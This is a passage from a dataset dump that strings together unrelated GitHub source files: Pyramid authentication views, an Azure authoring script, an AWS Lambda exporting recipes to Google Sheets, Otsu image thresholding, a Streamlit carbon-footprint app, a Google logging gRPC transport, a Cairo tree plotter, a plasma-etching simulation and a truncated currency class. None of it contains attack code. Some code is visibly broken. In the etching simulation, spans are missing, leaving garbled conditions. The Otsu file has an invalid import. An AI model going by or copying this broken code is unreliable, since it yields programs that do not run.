pyramid.response import Response\nfrom pyramid.renderers import render_to_response\nfrom pyramid.security import remember, forget\nfrom pyramid.httpexceptions import HTTPFound, HTTPNotFound\n\nfrom rhombus.views import roles\nfrom rhombus.lib.roles import SYSADM, SYSVIEW\nfrom rhombus.models.user import UserClass, UserInstance\nfrom rhombus.lib.utils import get_dbhandler, random_string\n\nfrom urllib.parse import urlparse\nimport time\n\n\ndef index(request):\n return render_to_response( \"rhombus:templates/home.mako\", {}, request=request )\n\n\n@roles( SYSADM, SYSVIEW )\ndef panel(request):\n return render_to_response(\"rhombus:templates/panel.mako\", {}, request=request )\n\n\ndef login(request):\n \"\"\" login boilerplate\n fields:\n login\n password\n domain\n came_from\n \"\"\"\n\n dbh = get_dbhandler()\n\n msg = None\n referrer = request.referrer\n\n # set came_from\n came_from = request.params.get('came_from', referrer) or '/'\n userclass_name = request.params.get('userclass', None)\n if came_from == '/login':\n came_from = '/'\n\n # override with came_from in session\n came_from_session = request.session.get('came_from', None)\n if came_from_session:\n came_from = came_from_session\n else:\n request.session['came_from'] = came_from\n\n login = request.params.get('login', '')\n if '/' in login:\n login, userclass_name = login.split('/')\n elif '@' in login:\n # find based on email\n users = dbh.get_user_by_email(login)\n if len(users) > 1:\n # email is used by more than 1 users\n msg = 'Email address is used by multiple users!'\n elif len(users) == 1:\n user = users[0]\n login, userclass_name = user.login, user.userclass.domain\n else:\n msg = 'Email address does not match with any users'\n elif userclass_name is None:\n userclass_name = request.registry.settings.get('rhombus.default.userclass','_SYSTEM_')\n\n if request.POST and msg is None:\n\n passwd = request.params.get('password', '')\n userclass_id = int(request.params.get('domain', 1))\n\n userclass = dbh.get_userclass( userclass_name )\n\n if userclass:\n\n userinstance = userclass.auth_user( login, passwd )\n\n if userinstance is not None:\n headers = set_user_headers(userinstance, request)\n if came_from:\n o1 = urlparse(came_from)\n o2 = urlparse(request.host_url)\n if o1.netloc.lower() == o2.netloc.lower():\n request.session.flash(\n ('success', 'Welcome %s!' % userinstance.login)\n )\n del request.session['came_from']\n return HTTPFound( location = came_from,\n headers = headers )\n\n msg = 'Invalid username or password!'\n\n else:\n msg = 'Invalid userclass'\n\n return render_to_response(\"rhombus:templates/login.mako\",\n { 'msg': msg, 'came_from': came_from,\n 'login': '%s' % (login) },\n request = request)\n\n\ndef logout(request):\n request.del_user()\n headers = forget(request)\n if request.registry.settings.get('rhombus.authmode', None) == 'master':\n redirect = request.params.get('redirect', None)\n if not redirect:\n redirect = request.referrer or '/'\n return HTTPFound( location = redirect, headers = headers )\n redirect = request.referrer or '/'\n return HTTPFound( location=redirect,\n headers = headers )\n\n\ndef confirm(request):\n \"\"\" return (status, userinfo) tuple with status as boolen for confirmed (True)\n or unconfirmed (False), and userinfo is a list with the following content:\n [ lastname, firstname, email, institution,\n { group: role, group: role} # groups where user is member,\n [ group, group, ...] 
# groups where user is not member\n ]\n \"\"\"\n\n token = request.params.get('principal', '')\n print('confirmation request for:', token)\n userinfo = request.params.get('userinfo', 0)\n if not token:\n return [False, []]\n\n key = token.encode('ASCII')\n userinstance = request.auth_cache.get(key, None)\n\n if not userinstance:\n return [False, []]\n\n if userinfo:\n dbh = get_dbhandler()\n user = dbh.get_user( userinstance.id )\n # prepare for group sync\n\n usergroups = {}\n for ug in user.usergroups:\n usergroups[ug.group.name] = ug.role\n syncgroups = sorted(\n [grp_name for grp_name in [g.name for g in dbh.get_groups()]\n if grp_name.startswith('sync:')]\n )\n group_ins = {}\n group_out = []\n print(usergroups, syncgroups)\n for sg in syncgroups:\n if sg in usergroups:\n group_ins[sg[5:]] = usergroups[sg]\n else:\n group_out.append( sg[5:])\n\n userinfo = [ user.lastname, user.firstname, user.email, user.institution,\n group_ins, group_out ]\n else:\n userinfo = []\n\n return [True, userinfo]\n\n\ndef rhombus_css(request):\n \"\"\" this will update session, preventing time-out \"\"\"\n\n user = request.user\n if user:\n # unauthenticated_userid == autheticated_userid\n key = request.unauthenticated_userid.decode('ASCII')\n # refresh cache expiration\n request.auth_cache.set(key, user)\n\n return \"\"\n\n\ndef rhombus_js(request):\n\n return rhombus_css(request)\n\n\ndef set_user_headers(userinstance, request):\n \"\"\" create token, set user and return http header \"\"\"\n\n assert isinstance(userinstance, UserInstance)\n token = '|'.join(\n [userinstance.login, userinstance.domain, str(time.time()), random_string(128)]\n )\n request.set_user(token, userinstance)\n return remember(request, token)\n","repo_name":"trmznt/rhombus","sub_path":"rhombus/views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9958120984","text":"from reader import read_for_qna, read_for_luis\n\n\n\ndef qna(file_name, dispatcher):\n\tqna = read_for_qna(file_name, dispatcher)\n\tfor q in qna:\n\t\tprint(q)\n\t\tq.update()\n\n\treturn qna\n\ndef luis(file_name):\n\tluis = read_for_luis(file_name)\n\tfor l in luis:\n\t\tprint(l)\n\t\tl.update()\n\n\treturn luis\n\ndef main():\n\tfile_name = input('File name: ')\n\tdispatch_model = input('Dispatch model: ')\n\n\tqna_tasks = qna(file_name, dispatch_model)\n\tluis_tasks = luis(file_name)\n\n\tif len(qna_tasks) > 0:\n\t\tqna_tasks[0].publish()\n\n\tif len(luis_tasks) > 0:\n\t\tluis_tasks[0].publish()\n\nif __name__ == '__main__':\n\tmain()","repo_name":"dominicpocaan/azure-authoring-client","sub_path":"authoring_client.py","file_name":"authoring_client.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"3827185876","text":"# Reference : https://www.shedloadofcode.com/blog/creating-your-own-website-analytics-solution-with-aws-lambda-and-google-sheets\n# Reference : https://boto3.amazonaws.com/v1/documentation/api/latest/guide/dynamodb.html\nimport json\nimport gspread\nimport boto3\nfrom boto3.dynamodb.conditions import Attr\ngc = gspread.service_account(filename='credentials.json')\ngsheet = gc.open(\"Recipe Analytics\")\nsheet1 = gsheet.sheet1\n\ndef lambda_handler(event, context):\n print(event)\n print(event['body'])\n dynamoDb = boto3.resource('dynamodb')\n table = dynamoDb.Table('recipes')\n comprehend = 
boto3.client(\"comprehend\")\n email = json.loads(event['body'])['email'];\n print(email)\n response = table.scan();\n print(response)\n \n items = response['Items']\n print(items)\n if response['Count'] == 0: #if response count is zero return with a message \n return{\n 'statusCode': 200,\n 'body': json.dumps('No recipe exists')\n }\n else:\n sheet1.delete_rows(2, 42) #Deleting already filled details every time the lambda is triggered\n my_list = []\n for item in items:\n l = item[\"email\"]\n if(email == l):\n recipeName = item[\"recipeName\"]\n recipeMap = {'recipe_name' : recipeName, 'day' : item['day'], 'month' : item['month'], 'year': item['year'] }\n my_list.append(recipeMap)\n else:\n continue\n print(my_list) \n write_events_to_google_sheet(my_list)\n return { \n \"statusCode\": 200,\n \"body\": json.dumps(\"Recipe saved in google sheets\"),\n } \n \n\ndef write_events_to_google_sheet(my_list):\n for recipes in my_list:\n recipeName = recipes['recipe_name'];\n print(recipeName)\n day = recipes['day'];\n print(day)\n month = recipes['month'];\n print(month)\n year = recipes['year'];\n print(year)\n row = [recipeName, day, month, year ]\n print(row)\n sheet1.insert_row(row, index = 2)\n \n \n \n \n \n \n \n ","repo_name":"Saifali786/Halifax-Foodie","sub_path":"Lambda Function/recipeVisualization/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33233803290","text":"import numpy as np\r\nfrom PIL import Image\r\nimport sys.float_info.epsilon as eps\r\n\r\ndef Otsu(Thresholds,image):\r\n \"\"\"Given a list of Thresholds and an image location , returns the fitness using Otsu's Objective function\"\"\"\r\n Thresholds.append(256)\r\n Thresholds.insert(0, 0)\r\n Thresholds.sort()\r\n img = Image.open(image).convert(\"L\")\r\n img=np.asarray(img)\r\n\r\n hist = [0] * 256 \r\n for i in range(len(img)):\r\n for j in range(len(img[0])):\r\n hist[int(img[i][j])] += 1\r\n\r\n Total_Pixels = len(img)*len(img[0])\r\n\r\n for i in range(len(hist)): # Probabilities\r\n hist[i] = hist[i] / Total_Pixels\r\n\r\n cumulative_sum = [] # declaractions\r\n cumulative_mean = []\r\n global_mean = 0\r\n Sigma = 0\r\n\r\n for i in range(len(Thresholds)-1):\r\n cumulative_sum.append(sum(hist[Thresholds[i]:Thresholds[i + 1]])+eps) # Cumulative sum of each Class\r\n\r\n cumulative = 0\r\n for j in range(Thresholds[i], Thresholds[i + 1]):\r\n cumulative = cumulative + (j + 1) * hist[j]\r\n \r\n cumulative_mean.append(cumulative / cumulative_sum[-1]) # Cumulative mean of each Class\r\n\r\n global_mean = global_mean + cumulative # Global Intensity Mean\r\n\r\n for i in range(len(cumulative_mean)): # Computing Sigma\r\n Sigma = Sigma + (cumulative_sum[i] *\r\n ((cumulative_mean[i] - global_mean) ** 2))\r\n\r\n return(Sigma)\r\n","repo_name":"iam-v0id/Otsu-MultiLevel-Thresholding","sub_path":"Otsu.py","file_name":"Otsu.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"70305165342","text":"import streamlit as st\r\nimport datetime\r\nimport torch\r\nimport os\r\nimport time\r\nimport geocoder\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nfrom PIL import Image\r\nfrom geopy.geocoders import Nominatim\r\nfrom pprint import pprint\r\n\r\n\r\n# variables for emissions calculator\r\napple_kg = 0.15\r\napple_co2 = 0.3\r\nbanana_kg = 0.12\r\nbanana_co2 = 
0.8\r\ncitrus_kg = 0.14\r\ncitrus_co2 = 0.3\r\ncarrot_kg = 0.02\r\ncarrot_co2 = 0.3\r\nbroccoli_kg = 0.4\r\nbroccoli_co2 = 0.4\r\nco2_total = 0\r\norange_count = 0\r\napple_count = 0\r\ncarrot_count = 0\r\nbanana_count = 0\r\nbroc_count = 0\r\n\r\n# model params\r\nmodel = torch.hub.load('ultralytics/yolov5', 'yolov5s')\r\nmodel.conf = 0.25 # NMS confidence threshold\r\nmodel.max_det = 100 # maximum number of detections per image\r\n\r\n#~~~~~~~~~~~~~~~~~ auto city detection~~~~~~~~~~~~~~~~~~~~~#\r\ng = geocoder.ip('me')\r\napp = Nominatim(user_agent=\"tutorial\")\r\ndef get_address_by_location(latitude, longitude, language=\"en\"):\r\n \"\"\"This function returns an address as raw from a location\r\n will repeat until success\"\"\"\r\n # build coordinates string to pass to reverse() function\r\n coordinates = f\"{latitude}, {longitude}\"\r\n # sleep for a second to respect Usage Policy\r\n time.sleep(1)\r\n try:\r\n return app.reverse(coordinates, language=language).raw\r\n except:\r\n return get_address_by_location(latitude, longitude)\r\n# detect city from coordinates\r\nlatitude = g.latlng[0]\r\nlongitude = g.latlng[1]\r\naddress = get_address_by_location(latitude, longitude)\r\ncurrent_city = address['address']['city']\r\n\r\n#~~~~~~~~~~~~~~~~~ GUI ~~~~~~~~~~~~~~~~~~~~~#\r\n# Main page\r\nst.title(\"Welcome to FoodPrint!:apple::shopping_trolley::earth_americas:\")\r\nst.subheader(\"This application calculates the total carbon footprint of the food in your grocery cart and compares it to other real world carbon emissions. Keep track of your carbon footprint with Foodprint!\")\r\n\r\n# Sidebar\r\nimage = Image.open(r\"./gui_images/logo.png\")\r\nst.sidebar.image(image, caption = None, width = 210, use_column_width = 210)\r\nname = st.sidebar.text_input(\"What is your name?\")\r\nif name:\r\n output_name = st.sidebar.write(\"Hi \" + str(name) + \", welcome to FoodPrint! 
We will help you calculate the carbon footprint of your food.\")\r\n\r\n# Output current time and location\r\ntoday = datetime.date.today()\r\nst.sidebar.markdown('**Time and Location:**')\r\nst.sidebar.write(current_city)\r\nst.sidebar.markdown('**Current Date:**')\r\nst.sidebar.write(str(today))\r\n\r\n# ML Stuff\r\nhave_image = False\r\nuploaded_image = st.sidebar.file_uploader(\"Upload an image of your grocery cart below:\", type = [\"png\", \"jpg\", \"jpeg\"])\r\nif uploaded_image is not None:\r\n    food_image = Image.open(uploaded_image)\r\n    filename = uploaded_image.name\r\n    have_image = True\r\n\r\n# Run model, compute emissions, display on GUI\r\nif ((have_image==True) & (st.sidebar.button(\"What's the carbon footprint of my shopping cart?\"))):\r\n    \r\n    results = model(food_image)\r\n    # progress bar that does absolutely nothing but look cool\r\n    my_bar = st.progress(0)\r\n    for percent_complete in range(100):\r\n        time.sleep(0.001)\r\n        my_bar.progress(percent_complete + 1)\r\n    st.success('Thanks for doing your part!', icon=\"✅\")\r\n\r\n    # split into two tabular sections\r\n    tab1, tab2 = st.tabs([\"Results\", \"Tips\"])\r\n    with tab1:\r\n        # save and display image\r\n        results.save()\r\n        image_path = 'runs/detect/exp/image0.jpg'\r\n        print(image_path)\r\n        result_image = Image.open(image_path)\r\n        col1, col2 = st.columns(2)\r\n        with col1:\r\n            # type and number of foods\r\n            table = results.pandas().xyxy[0]\r\n            results_list = table.name.values.tolist()\r\n            print(results_list)\r\n\r\n            # emissions calculator stuff\r\n            # dictionary that will have the amount of each item\r\n            # the stuff in colons are emojis :)\r\n            detected = {':apple:Apples': 0, ':banana:Bananas': 0, ':tangerine:Oranges': 0, ':carrot:Carrots': 0, ':broccoli:Broccoli': 0}\r\n\r\n            # counting each item from the results list that yolo spits out\r\n            for x in results_list:\r\n                if x == \"orange\":\r\n                    orange_count += 1\r\n                    detected[':tangerine:Oranges'] = orange_count\r\n                elif x == \"apple\":\r\n                    apple_count += 1\r\n                    detected[':apple:Apples'] = apple_count\r\n                elif x == \"carrot\":\r\n                    carrot_count += 1\r\n                    detected[':carrot:Carrots'] = carrot_count\r\n                elif x == \"banana\":\r\n                    banana_count += 1\r\n                    detected[':banana:Bananas'] = banana_count\r\n                elif x == \"broccoli\":\r\n                    broc_count += 1\r\n                    detected[':broccoli:Broccoli'] = broc_count\r\n            print(detected)\r\n\r\n            # if item is detected and has nonzero items in the image, do math\r\n            # each food type is checked independently so every detected item contributes\r\n            # total per item = quantity*item avg weight (kgItem)*co2 emissions per item(kgCo2/kgItem)\r\n            if detected[':apple:Apples'] != 0:\r\n                apple_em = detected[':apple:Apples'] * apple_kg * apple_co2\r\n                co2_total += apple_em\r\n            if detected[':banana:Bananas'] != 0:\r\n                banana_em = detected[':banana:Bananas'] * banana_kg * banana_co2\r\n                co2_total += banana_em\r\n            if detected[':tangerine:Oranges'] != 0:\r\n                orange_em = detected[':tangerine:Oranges'] * citrus_kg * citrus_co2\r\n                co2_total += orange_em\r\n            if detected[':carrot:Carrots'] != 0:\r\n                carrot_em = detected[':carrot:Carrots'] * carrot_kg * carrot_co2\r\n                co2_total += carrot_em\r\n            if detected[':broccoli:Broccoli'] != 0:\r\n                broccoli_em = detected[':broccoli:Broccoli'] * broccoli_kg * broccoli_co2\r\n                co2_total += broccoli_em\r\n\r\n            # display emissions as a metric because it looks cool\r\n            # the delta is just a dummy rn, can be made to indicate something\r\n            st.metric(label=\"kg Co2 Emissions\", value=co2_total, delta=\"GOOD\")\r\n            # compare your emissions to something in the real world! 
Aka driving a car 1 mile = 0.034 kg of carbon emissions\r\n drive = round((co2_total/0.034), 2)\r\n st.write(\"This is equal to driving :car: \", str(drive), \"miles\")\r\n \r\n st.write(\"We detected: \")\r\n # displays nonzero keys, thus displays items detected\r\n for i in detected:\r\n if detected[i] != 0:\r\n st.write(i, detected[i])\r\n with col2:\r\n # displays image with bounding boxes from yolo\r\n st.image(result_image)\r\n os.unlink(image_path)\r\n os.rmdir('runs/detect/exp')\r\n\r\n with tab2:\r\n # info about reducing your emissions\r\n # this can also include the seasons table, this stuff is just kinda placeholder for now\r\n st.header(\"Tips to Reduce Your Food's Carbon Emissions\")\r\n st.subheader(\"- Eat produce that is in season\")\r\n st.subheader(\"- Buy Local\")\r\n st.subheader('- Decrease your red meat intake')\r\n st.markdown('[Learn More](https://ourworldindata.org/food-choice-vs-eating-local \"Learn More\")',\r\n unsafe_allow_html=False)\r\n\r\nmonth_gen= today.strftime(\"%B\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"astutt/foodprint","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7401,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"7234455637","text":"# https://www.checkio.org/mission/letter-queue/\n__author__ = 'Vitalii K'\n\nfrom collections import deque\n\n\ndef letter_queue(commands):\n fifo = deque([])\n for command in commands:\n if 'PUSH' in command:\n fifo.append(command.split(' ')[1])\n elif fifo:\n fifo.popleft()\n return ''.join(fifo)\n\n\nif __name__ == '__main__':\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert letter_queue([\"PUSH A\", \"POP\", \"POP\", \"PUSH Z\", \"PUSH D\", \"PUSH O\", \"POP\", \"PUSH T\"]) == \"DOT\", \"dot example\"\n assert letter_queue([\"POP\", \"POP\"]) == \"\", \"Pop, Pop, empty\"\n assert letter_queue([\"PUSH H\", \"PUSH I\"]) == \"HI\", \"Hi!\"\n assert letter_queue([]) == \"\", \"Nothing\"","repo_name":"tivaliy/checkio","sub_path":"letter_queue.py","file_name":"letter_queue.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"27787758319","text":"import google.api_core.grpc_helpers\n\nfrom googlecloudsdk.third_party.logging_v2.proto import logging_pb2_grpc\n\n\nclass LoggingServiceV2GrpcTransport(object):\n \"\"\"gRPC transport class providing stubs for\n google.logging.v2 LoggingServiceV2 API.\n\n The transport provides access to the raw gRPC stubs,\n which can be used to take advantage of advanced\n features of gRPC.\n \"\"\"\n # The scopes needed to make gRPC calls to all of the methods defined\n # in this service.\n _OAUTH_SCOPES = (\n 'https://www.googleapis.com/auth/cloud-platform',\n 'https://www.googleapis.com/auth/cloud-platform.read-only',\n 'https://www.googleapis.com/auth/logging.admin',\n 'https://www.googleapis.com/auth/logging.read',\n 'https://www.googleapis.com/auth/logging.write',\n )\n\n def __init__(self, channel=None, credentials=None,\n address='logging.googleapis.com:443'):\n \"\"\"Instantiate the transport class.\n\n Args:\n channel (grpc.Channel): A ``Channel`` instance through\n which to make calls. This argument is mutually exclusive\n with ``credentials``; providing both will raise an exception.\n credentials (google.auth.credentials.Credentials): The\n authorization credentials to attach to requests. 
These\n credentials identify this application to the service. If none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n address (str): The address where the service is hosted.\n \"\"\"\n # If both `channel` and `credentials` are specified, raise an\n # exception (channels come with credentials baked in already).\n if channel is not None and credentials is not None:\n raise ValueError(\n 'The `channel` and `credentials` arguments are mutually '\n 'exclusive.',\n )\n\n # Create the channel.\n if channel is None:\n channel = self.create_channel(\n address=address,\n credentials=credentials,\n options={\n 'grpc.max_send_message_length': -1,\n 'grpc.max_receive_message_length': -1,\n }.items(),\n )\n\n self._channel = channel\n\n # gRPC uses objects called \"stubs\" that are bound to the\n # channel and provide a basic method for each RPC.\n self._stubs = {\n 'logging_service_v2_stub': logging_pb2_grpc.LoggingServiceV2Stub(channel),\n }\n\n\n @classmethod\n def create_channel(\n cls,\n address='logging.googleapis.com:443',\n credentials=None,\n **kwargs):\n \"\"\"Create and return a gRPC channel object.\n\n Args:\n address (str): The host for the channel to use.\n credentials (~.Credentials): The\n authorization credentials to attach to requests. These\n credentials identify this application to the service. If\n none are specified, the client will attempt to ascertain\n the credentials from the environment.\n kwargs (dict): Keyword arguments, which are passed to the\n channel creation.\n\n Returns:\n grpc.Channel: A gRPC channel object.\n \"\"\"\n return google.api_core.grpc_helpers.create_channel(\n address,\n credentials=credentials,\n scopes=cls._OAUTH_SCOPES,\n **kwargs\n )\n\n @property\n def channel(self):\n \"\"\"The gRPC channel used by the transport.\n\n Returns:\n grpc.Channel: A gRPC channel object.\n \"\"\"\n return self._channel\n\n @property\n def delete_log(self):\n \"\"\"Return the gRPC stub for :meth:`LoggingServiceV2Client.delete_log`.\n\n Deletes all the log entries in a log. The log reappears if it receives new\n entries. Log entries written shortly before the delete operation might not\n be deleted. Entries received after the delete operation with a timestamp\n before the operation will be deleted.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['logging_service_v2_stub'].DeleteLog\n\n @property\n def list_log_entries(self):\n \"\"\"Return the gRPC stub for :meth:`LoggingServiceV2Client.list_log_entries`.\n\n Lists log entries. Use this method to retrieve log entries that\n originated from a project/folder/organization/billing account. For ways\n to export log entries, see `Exporting\n Logs `__.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['logging_service_v2_stub'].ListLogEntries\n\n @property\n def write_log_entries(self):\n \"\"\"Return the gRPC stub for :meth:`LoggingServiceV2Client.write_log_entries`.\n\n Writes log entries to Logging. This API method is the\n only way to send log entries to Logging. 
This method\n is used, directly or indirectly, by the Logging agent\n (fluentd) and all logging libraries configured to use Logging.\n A single request may contain log entries for a maximum of 1000\n different resources (projects, organizations, billing accounts or\n folders)\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['logging_service_v2_stub'].WriteLogEntries\n\n @property\n def list_monitored_resource_descriptors(self):\n \"\"\"Return the gRPC stub for :meth:`LoggingServiceV2Client.list_monitored_resource_descriptors`.\n\n Lists the descriptors for monitored resource types used by Logging.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['logging_service_v2_stub'].ListMonitoredResourceDescriptors\n\n @property\n def list_logs(self):\n \"\"\"Return the gRPC stub for :meth:`LoggingServiceV2Client.list_logs`.\n\n Lists the logs in projects, organizations, folders, or billing accounts.\n Only logs that have entries are listed.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['logging_service_v2_stub'].ListLogs\n\n @property\n def tail_log_entries(self):\n \"\"\"Return the gRPC stub for :meth:`LoggingServiceV2Client.tail_log_entries`.\n\n Streaming read of log entries as they are ingested. Until the stream is\n terminated, it will continue reading logs.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['logging_service_v2_stub'].TailLogEntries\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/third_party/logging_v2/gapic/transports/logging_service_v2_grpc_transport.py","file_name":"logging_service_v2_grpc_transport.py","file_ext":"py","file_size_in_byte":7516,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"18048441096","text":"#!/bin/env python\n\n# written while watching 2008 olympics\n\nimport cairo\nfrom string import split, strip\nfrom math import pi\nfrom sys import argv\n\nWIDTH, HEIGHT = 700, 960\n\nfontSize = 15\ncornerRadius = 6\nextraSpace = 5\ndeltaX = 5\ndeltaY = 5\nscale = 1\n\ndef numspaces(str):\n\tn = 0\n\tfor s in str:\n\t\tif s == ' ':\n\t\t\tn += 1\n\t\telse:\n\t\t\treturn n\n\ndef loaddata(fn):\n\tlines = open(fn).readlines()\n\tlastn = -1\n\tadd = {}\n\tfor l in lines:\n\t\tn = numspaces(l)\n\t\ts = split(strip(l))\n\t\tif len(s) == 0:\n\t\t\tcontinue\n\t\tdir = s[0]\n\t\tif len(s) < 2:\n\t\t\tinfo = ''\n\t\telse:\n\t\t\tinfo = strip(l[n+len(dir):])\n\t\tdata = [dir, info]\n\t\tif lastn == -1:\n\t\t\tadd[0] = data\n\t\telse:\n\t\t\tif n > lastn:\n\t\t\t\tadd[n] = last\n\t\t\tadd[n].append(data)\n\t\tlastn = n\n\t\tlast = data\n\t\t\t\n\treturn add[0]\n\ndef drawtree(ctx, x, y, data):\n\tif len(data) < 2:\n\t\treturn\n\tctx.move_to(x, y)\n\tctx.select_font_face(\"monospace\", 0, 1)\n\tctx.show_text(data[0]+' ')\n\tctx.select_font_face(\"serif\", 0, 0)\n\tcomments = split(data[1], \"\\\\\");\n\tdelta = 0\n\tx0, y0 = ctx.get_current_point()\n\tfor c in comments:\n\t\tctx.move_to(x0, y0)\n\t\tk = split(strip(c), '\"')\n\t\tl = len(k)\n\t\tfor i in range(l):\n\t\t\tif i%2 == 
0:\n\t\t\t\tctx.select_font_face(\"serif\", 0, 0)\n\t\t\telse:\n\t\t\t\tctx.select_font_face(\"monospace\", 0, 0)\n\t\t\tctx.show_text(k[i])\n\t\tdelta += fontSize+2\n\t\ty0 = y + delta\n\tdelta += extraSpace\n\n\ty0 = y+deltaY\n\ty += delta\n\tdaughters = data[2:]\n\tn = len(daughters)\n\tfor i in range(n):\n\t\tv = daughters[i]\n\t\tctx.move_to(x+deltaX, y0)\n\t\ty0 = y-deltaY\n\t\tif i < n-1:\n\t\t\tctx.line_to(x+deltaX, y0)\n\t\t\tctx.line_to(x+3*deltaX, y0)\n\t\telse:\n\t\t\tctx.arc_negative(x+deltaX+cornerRadius, y0-cornerRadius, cornerRadius, pi, pi/2.)\n\t\t\tctx.line_to(x+3*deltaX, y0)\n\t\tctx.stroke()\n\t\ty = drawtree(ctx, x+4*deltaX, y, v)\n\treturn y\n\n# Setup Cairo\n#surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, WIDTH, HEIGHT)\nsurface = cairo.PDFSurface(argv[2], WIDTH, HEIGHT)\nctx = cairo.Context(surface)\nctx.scale(scale, scale)\nctx.set_font_size(fontSize)\n\ndata = loaddata(argv[1])\n\ndrawtree(ctx, 10, 10+fontSize, data)\n\n#surface.write_to_png(\"tree.png\")\n","repo_name":"difx/difx","sub_path":"doc/userguide/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"32092904200","text":"import sys\n\nfrom interpreter.environment.environment import Environment\nfrom interpreter.lexer.lexer import Lexer\nfrom interpreter.parser.parser import Parser\nfrom interpreter.source.source import Source\n\n\nclass Interpreter:\n def __init__(self, source: Source):\n lexer = Lexer(source)\n parser = Parser(lexer)\n self.environment = Environment(parser.parse_program())\n self.result = self.environment.run_main()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n with open(sys.argv[1], 'r') as file:\n source = Source(file)\n interpreter = Interpreter(source)\n print(str(interpreter.result))\n","repo_name":"jfpio/TKOM-Interpreter","sub_path":"interpreter/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"29497153728","text":"#\n# Etching of a solid\n# Examples for plasma pyhsics lectures\n# Achim von Keudell\n# Ruhr University Bochum, 2022\n#\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n# ----------------------------------------------------------------------------\n# Monte Carlo Simulation etching \n# ----------------------------------------------------------------------------\n#model = 'directional'\nmodel = 'isotrop'\n\nif model == 'directional':\n cosexponent = 20\n animationfile = 'etchdirectional.gif'\nif model == 'isotrop':\n cosexponent = 1\n animationfile = 'etchisotrop.gif'\n\nlimitcf = 2\nchemetch = 0.5\ndt = 0.1\n\nNBParticles = 5e4\nNBParticlesReplot = 1e2\nNBBinsX = 200\nNBBinsY = 200\nms = 1 # markersize\n\n# ---------------------------------------------------------------\n# Setup structure\n# ---------------------------------------------------------------\nx = np.zeros(NBBinsX)\ny = np.zeros(NBBinsX)\nbins = np.zeros([NBBinsX,NBBinsY])\n\n# material\nytop = int(0.75*NBBinsY)\nfor i in range(NBBinsX):\n for j in range(ytop):\n bins[i,j] = 1\n\n# mask\nylayer = ytop + 5\nfor i in range(NBBinsX):\n for j in range(ytop,ylayer):\n bins[i,j] = 2\n\n# large trench\nxwidth = 50\nxgaplarge = 0.7*NBBinsX\nxgap = int(xgaplarge-xwidth/2)\nfor i in range(xgap,xgap+xwidth):\n for j in range(ytop,ylayer):\n bins[i,j] = 1\n\n# small trench\nxwidth = 
20\nxgapsmall = 0.3*NBBinsX\nxgap = int(xgapsmall-xwidth/2)\nfor i in range(xgap,xgap+xwidth):\n for j in range(ytop,ylayer):\n bins[i,j] = 1\n\n# ---------------------------------------------------------------\n# Count surrounding CF species\n# --------------------------------------------------------------- \ndef surrounding(i,j):\n pt = 0\n if i>1 and i1 and j1 and i1 and j0:\n t += dt\n xp += vx*dt + 1/2*dt**2*a # new position \n yp += vy*dt + 1/2*dt**2*a # new position \n \n if xp<0:\n xp = NBBinsX+xp\n if xp>NBBinsX:\n xp = xp-NBBinsX\n xi = int(np.trunc(xp)) # x index bin\n yi = int(np.trunc(yp)) # y index bin\n if xi>=0 and xi=0 and yi0:\n t += dt\n xp += vx*dt + 1/2*dt**2*a # new position \n yp += vy*dt + 1/2*dt**2*a # new position \n \n if xp<0:\n xp = NBBinsX+xp\n if xp>NBBinsX:\n xp = xp-NBBinsX\n xi = int(np.trunc(xp)) # x index bin\n yi = int(np.trunc(yp)) # y index bin\n if xi>=1 and xi=0 and yiNBBinsX-1: xi = xi-(NBBinsX-1) \n if yi<0: yi = NBBinsY+yi\n if yi>NBBinsX-1: yi = yi-(NBBinsY-1) \n # add radical only if place empty and maximal 2 on mask\n if bins[xi,yi] == 0 and yi 1 else \"\"}'\n\n def __int__(self):\n return self.amount\n\n def __repr__(self):\n return self.__str__()\n\n def __add__(self, other):\n if isinstance(other, Currency):\n if other.currency != self.currency:\n raise Exception(f'Cannot add between Currency type {self.currency} and {other.currency}')\n self.amount += other.amount\n elif isinstance(other, int):\n self.amount += 